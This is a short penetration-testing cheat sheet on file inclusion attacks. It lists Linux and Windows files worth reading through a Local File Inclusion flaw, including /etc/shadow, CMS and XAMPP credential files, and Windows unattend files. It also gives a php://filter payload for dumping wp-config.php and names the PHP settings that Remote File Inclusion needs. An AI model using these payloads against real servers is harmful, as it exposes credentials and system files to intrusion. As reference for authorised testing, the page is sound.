LFI / RFI

Interesting Files for LFI

Local File Inclusion
Linux
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
​
# Log Files
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/var/log/messages
/var/log/cron.log
/var/log/auth.log
​
/var/www/html/wp-config.php                <-- Wordpress
/var/www/configuration.php                 <-- Joomla
/var/www/html/inc/header.inc.php           <-- Dolphin
/var/www/html/sites/default/settings.php   <-- Drupal
/var/www/configuration.php                 <-- Mambo
/var/www/config.php                        <-- PHP
Windows
C:/Windows/System32/drivers/etc/hosts
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/Panther/Unattend.txt
C:/Unattend.xml
C:/Autounattend.xml
C:/Windows/system32/sysprep
​
C:/inetpub/wwwroot
C:/inetpub/wwwroot/web.config
C:/inetpub/logs/logfiles
​
# XAMPP
C:/xampp/apache/conf/httpd.conf
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/xampp/tomcat/conf/web.xml
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webalizer/webdav.txt
C:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf
php://filter
php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php
Remote File Inclusion
# Both the below settings need to be enabled for RFI to be successful. 
allow_url_fopen = On
allow_url_include = On
​

SQL Injection Payloads

Recover contents

Last modified 2yr ago